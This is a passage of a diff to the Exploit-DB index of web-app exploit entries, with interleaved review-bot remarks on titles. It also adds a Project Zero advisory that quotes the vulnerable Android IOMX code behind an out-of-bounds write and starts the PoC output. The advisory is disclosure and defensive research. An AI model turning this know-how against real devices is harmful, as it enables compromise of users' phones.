@@ -27943,7 +27952,6 @@ id,file,description,date,author,platform,type,port 26107,platforms/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 - dispbbs.asp page Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 26108,platforms/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - dispuser.asp name Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 26109,platforms/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - boardhelp.asp Multiple Parameter Cross-Site Scripting",2005-08-08,Lostmon,asp,webapps,0 -26110,platforms/php/webapps/26110.txt,"Gravity Board X 1.1 - DeleteThread.php Cross-Site Scripting",2005-08-08,rgod,php,webapps,0 26111,platforms/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,php,webapps,0 26112,platforms/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php' cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 26113,platforms/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - auth.php cid Parameter SQL Injection",2005-08-08,almaster,php,webapps,0 
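Review bot: the 26110 row (Gravity Board X 1.1, DeleteThread.php Cross-Site Scripting) is removed and no row in this hunk takes over that issue; the remaining 26111 entry covers only the CSS template access problem. If the XSS was folded into another entry, name that id in the commit message, and check that platforms/php/webapps/26110.txt is deleted too so the tree holds no file without an index row.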
@@ -29101,7 +29109,7 @@ id,file,description,date,author,platform,type,port 27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - Slideshow.php name Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 27619,platforms/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - detail.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 27620,platforms/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",cgi,webapps,0 -27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - Connect.INC Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0 +27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - 'Connect.INC' Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0 27622,platforms/php/webapps/27622.txt,"Dokeos 1.x - viewtopic.php SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps,0 27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - Jahr Parameter Cross-Site Scripting",2006-04-11,Snake_23,php,webapps,0 27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - Include.php SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps,0 
@@ -29284,8 +29292,7 @@ id,file,description,date,author,platform,type,port 27846,platforms/asp/webapps/27846.txt,"EImagePro - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 -27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 -27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 +27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - 'Results.cfm' SQL Injection",2006-04-25,r0t,cfm,webapps,0 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0 
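Review bot: 27853 and 27854 are collapsed into one row titled "Cartweaver 2.16.11 - 'Results.cfm' SQL Injection", which loses Details.cfm and both parameter names (category, ProdID). If the merged 27853.txt covers both pages, the title should reflect that, for example by naming both files or using "Multiple SQL Injection"; as written, the Details.cfm issue disappears from the index.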
@@ -29626,11 +29633,11 @@ id,file,description,date,author,platform,type,port 28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0 40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0 28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0 -28403,platforms/php/webapps/28403.txt,"Mambo Component 'lmtg_myhomepage' 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 -28404,platforms/php/webapps/28404.txt,"Mambo Component 'com_rssxt' 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 +28403,platforms/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0 +28404,platforms/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Parameter Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 28409,platforms/php/webapps/28409.txt,"Vtiger CRM 5.4.0 - (index.php onlyforuser Parameter) SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 -28410,platforms/php/webapps/28410.txt,"Mambo Component 'com_admin-copy_module' - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 +28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Parameter Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts 
DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 28413,platforms/php/webapps/28413.txt,"cPanel 10.x - dohtaccess.html dir Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 @@ -29652,7 +29659,7 @@ id,file,description,date,author,platform,type,port 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 -28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 +28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0 28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 - comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0 
@@ -31506,15 +31513,15 @@ id,file,description,date,author,platform,type,port 31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component 'com_smslist' - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component 'com_activities' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps,0 31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component 'com_lexikon' - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 -31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 -31216,platforms/php/webapps/31216.txt,"Joomla! 
/ Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component Filebase - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 +31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0 32241,platforms/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps,0 32242,platforms/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection",2008-08-13,Rake,php,webapps,0 
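Review bot: this hunk leaves the 31206 to 31216 block with three naming styles: com_sg, com_salesrep and com_scheduling only lose their quotes, 'com_filebase' becomes Filebase, and the untouched 31206, 31207 and 31214 rows keep quoted 'com_...' names. Pick one form for the block; where the display name of a component is not known, keeping the quoted com_ name is more consistent than a bare one.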
@@ -31524,7 +31531,7 @@ id,file,description,date,author,platform,type,port 32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - admin_modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - modules.php module Parameter Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset)",2014-01-27,"David Um",windows,webapps,0 -31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0 31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component 'com_detail' - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 
@@ -31668,7 +31675,7 @@ id,file,description,date,author,platform,type,port 31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 -31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 +31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 
@@ -32415,8 +32422,8 @@ id,file,description,date,author,platform,type,port 32620,platforms/ios/webapps/32620.txt,"Vanctech File Commander 1.1 iOS - Multiple Vulnerabilities",2014-03-31,Vulnerability-Lab,ios,webapps,8080 32622,platforms/php/webapps/32622.txt,"WordPress Plugin Ajax Pagination 1.1 - Local File Inclusion",2014-03-31,"Glyn Wintle",php,webapps,80 32623,platforms/multiple/webapps/32623.txt,"EMC Cloud Tiering Appliance 10.0 - Unauthenticated XXE Arbitrary File Read (Metasploit)",2014-03-31,"Brandon Perry",multiple,webapps,0 -32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php adname Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 -32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - siteadmin/forgot.php Multiple Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 +32624,platforms/php/webapps/32624.txt,"PHP JOBWEBSITE PRO - 'adname' Parameter SQL Injection",2008-12-01,Pouya_Server,php,webapps,0 +32625,platforms/php/webapps/32625.txt,"PHP JOBWEBSITE PRO - 'forgot.php' Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32626,platforms/asp/webapps/32626.txt,"ASP Forum Script - messages.asp message_id Parameter SQL Injection",2008-12-01,Pouya_Server,asp,webapps,0 32627,platforms/php/webapps/32627.txt,"ASP Forum Script - new_message.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,php,webapps,0 32628,platforms/asp/webapps/32628.txt,"ASP Forum Script - messages.asp forum_id Parameter Cross-Site Scripting",2008-12-01,Pouya_Server,asp,webapps,0 
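Review bot: the two forgot.php rows are normalised in opposite directions: 32624 keeps the 'adname' parameter and drops the file, while 32625 keeps 'forgot.php' and drops both the siteadmin/ path and "Multiple Parameter". Both issues sit in the same script, so both titles should name it, e.g. "'forgot.php' 'adname' Parameter SQL Injection", and 32625 should still say that more than one parameter is affected.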
@@ -32522,7 +32529,7 @@ id,file,description,date,author,platform,type,port 32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' Parameter SQL Injection",2008-10-01,r45c4l,php,webapps,0 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 32806,platforms/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0 -32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 +32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login['Username'] Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32809,platforms/php/webapps/32809.txt,"Magento 1.2 - app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 
@@ -32838,7 +32845,7 @@ id,file,description,date,author,platform,type,port 33446,platforms/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 33447,platforms/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0 33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 - 'l' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0 -33449,platforms/php/webapps/33449.txt,"Conkurent PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0 +33449,platforms/php/webapps/33449.txt,"PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps,0 33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 - Cross-Site Scripting / Security Bypass",2009-12-31,indoushka,php,webapps,0 33451,platforms/php/webapps/33451.txt,"BosClassifieds 1.20 - 'recent.php' Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 33452,platforms/php/webapps/33452.txt,"Imagevue r16 - 'amount' Parameter Cross-Site Scripting",2009-12-31,indoushka,php,webapps,0 
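Review bot: 33449 drops the vendor prefix Conkurent, whereas the 12372 retitle earlier in this patch adds a vendor prefix (Alstrasoft) to AskMe Pro. State which convention the index follows; if vendor names are kept where known, this row should stay "Conkurent PHPMyCart 1.3".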
@@ -34225,7 +34232,7 @@ id,file,description,date,author,platform,type,port 35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 -35752,platforms/php/webapps/35752.txt,"Mambo Component 'com_docman' 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 +35752,platforms/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 
@@ -34428,16 +34435,16 @@ id,file,description,date,author,platform,type,port 36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,php,webapps,0 36095,platforms/php/webapps/36095.txt,"S9Y Serendipity 1.5.1 - 'research_display.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 36096,platforms/php/webapps/36096.txt,"Web Professional - 'default.php' SQL Injection",2011-08-31,The_Exploited,php,webapps,0 -36097,platforms/php/webapps/36097.txt,"Mambo Component 'com_n-skyrslur' - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 +36097,platforms/php/webapps/36097.txt,"Mambo Component N-Skyrslur - Cross-Site Scripting",2011-09-02,CoBRa_21,php,webapps,0 36098,platforms/php/webapps/36098.html,"Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email",2015-02-17,"Brandon Murphy",php,webapps,80 36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 -36102,platforms/php/webapps/36102.txt,"Mambo Component 'com_n-gallery' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36102,platforms/php/webapps/36102.txt,"Mambo Component N-Gallery - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36103,platforms/php/webapps/36103.txt,"Mambo Component Ahsshop - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0 -36106,platforms/php/webapps/36106.txt,"Mambo Component 'com_n-press' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36106,platforms/php/webapps/36106.txt,"Mambo Component N-Press - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0 -36108,platforms/php/webapps/36108.txt,"Mambo Component 'com_n-frettir' - SQL 
Injection",2011-09-02,CoBRa_21,php,webapps,0 -36109,platforms/php/webapps/36109.txt,"Mambo Component 'com_n-myndir' - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36108,platforms/php/webapps/36108.txt,"Mambo Component N-Frettir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 +36109,platforms/php/webapps/36109.txt,"Mambo Component N-Myndir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36110,platforms/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,php,webapps,0 36112,platforms/php/webapps/36112.txt,"Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation",2015-02-18,"Kacper Szurek",php,webapps,80 36113,platforms/php/webapps/36113.txt,"Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting",2011-09-05,R3d-D3V!L,php,webapps,0 @@ -35802,7 +35809,7 @@ id,file,description,date,author,platform,type,port 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 38309,platforms/php/webapps/38309.txt,"osCommerce - Cross-Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 38311,platforms/php/webapps/38311.txt,"BlackNova Traders - 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0 -38312,platforms/php/webapps/38312.txt,"AbanteCart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0 +40882,platforms/php/webapps/40882.txt,"Edge SkateShop - Authentication bypass",2016-12-06,Delilah,php,webapps,0 38314,platforms/php/webapps/38314.txt,"WordPress Plugin NextGEN Gallery - Full Path Disclosure",2013-02-14,"Henrique Montenegro",php,webapps,0 38315,platforms/php/webapps/38315.txt,"Sonar - Multiple Cross-Site Scripting Vulnerabilities",2013-02-12,DevilTeam,php,webapps,0 38316,platforms/cgi/webapps/38316.txt,"FortiManager 5.2.2 - Persistent Cross-Site Scripting",2015-09-25,hyp3rlinx,cgi,webapps,0 
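Review bot: the new 40882 row is out of place in the `@@ -35802,7 +35809,7 @@` hunk. It is written over the removed 38312 row, so an entry dated 2016-12-06 lands between 38311 and 38314 (both February 2013), while the other new webapps row in this patch, 40877, is appended after 40856 at the end of the section. Remove the 38312 row here and append 40882 at the end with 40877. The description should also read "Authentication Bypass", matching the capitalisation of the neighbouring titles such as "Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email".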
@@ -36850,3 +36857,4 @@ id,file,description,date,author,platform,type,port 40852,platforms/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",php,webapps,0 40853,platforms/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,hardware,webapps,0 40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0 +40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0 diff --git a/platforms/android/dos/40876.txt b/platforms/android/dos/40876.txt new file mode 100755 index 000000000..e2c1ab0af --- /dev/null +++ b/platforms/android/dos/40876.txt 
@@ -0,0 +1,169 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=932 + +The code in IOMXNodeInstance.cpp that handles enableNativeBuffers uses port_index without validation, leading to writing the dword value 0 or 1 at an attacker controlled offset from the IOMXNodeInstance structure. + +The vulnerable code is here (every write to mSecureBufferType): + +status_t OMXNodeInstance::enableNativeBuffers( + OMX_U32 portIndex, OMX_BOOL graphic, OMX_BOOL enable) { + Mutex::Autolock autoLock(mLock); + CLOG_CONFIG(enableNativeBuffers, "%s:%u%s, %d", portString(portIndex), portIndex, + graphic ? ", graphic" : "", enable); + OMX_STRING name = const_cast( + graphic ? "OMX.google.android.index.enableAndroidNativeBuffers" + : "OMX.google.android.index.allocateNativeHandle"); + + OMX_INDEXTYPE index; + OMX_ERRORTYPE err = OMX_GetExtensionIndex(mHandle, name, &index); + + if (err == OMX_ErrorNone) { + EnableAndroidNativeBuffersParams params; + InitOMXParams(¶ms); + params.nPortIndex = portIndex; + params.enable = enable; + + err = OMX_SetParameter(mHandle, index, ¶ms); + CLOG_IF_ERROR(setParameter, err, "%s(%#x): %s:%u en=%d", name, index, + portString(portIndex), portIndex, enable); + if (!graphic) { + if (err == OMX_ErrorNone) { + mSecureBufferType[portIndex] = + enable ? 
kSecureBufferTypeNativeHandle : kSecureBufferTypeOpaque; + } else if (mSecureBufferType[portIndex] == kSecureBufferTypeUnknown) { + mSecureBufferType[portIndex] = kSecureBufferTypeOpaque; + } + } + } else { + CLOG_ERROR_IF(enable, getExtensionIndex, err, "%s", name); + if (!graphic) { + // Extension not supported, check for manual override with system property + // This is a temporary workaround until partners support the OMX extension + char value[PROPERTY_VALUE_MAX]; + if (property_get("media.mediadrmservice.enable", value, NULL) + && (!strcmp("1", value) || !strcasecmp("true", value))) { + CLOG_CONFIG(enableNativeBuffers, "system property override: using native-handles"); + mSecureBufferType[portIndex] = kSecureBufferTypeNativeHandle; + } else if (mSecureBufferType[portIndex] == kSecureBufferTypeUnknown) { + mSecureBufferType[portIndex] = kSecureBufferTypeOpaque; + } + err = OMX_ErrorNone; + } + } + + return StatusFromOMXError(err); +} + +This code is reached from the binder interface android.hardware.IOMX in the mediaserver process; via the following code in IOMX.cpp which reads the port_index directly from the incoming parcel without any validation. + + case ENABLE_NATIVE_BUFFERS: + { + CHECK_OMX_INTERFACE(IOMX, data, reply); + + node_id node = (node_id)data.readInt32(); + OMX_U32 port_index = data.readInt32(); + OMX_BOOL graphic = (OMX_BOOL)data.readInt32(); + OMX_BOOL enable = (OMX_BOOL)data.readInt32(); + + status_t err = enableNativeBuffers(node, port_index, graphic, enable); + reply->writeInt32(err); + + return NO_ERROR; + } + +Running the attached proof-of-concept on a Nexus 5x yields the following output: + +--- binder OMX index-out-of-bounds --- +[0] opening /dev/binder +[0] looking up media.player +0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 . +0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 . +0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 
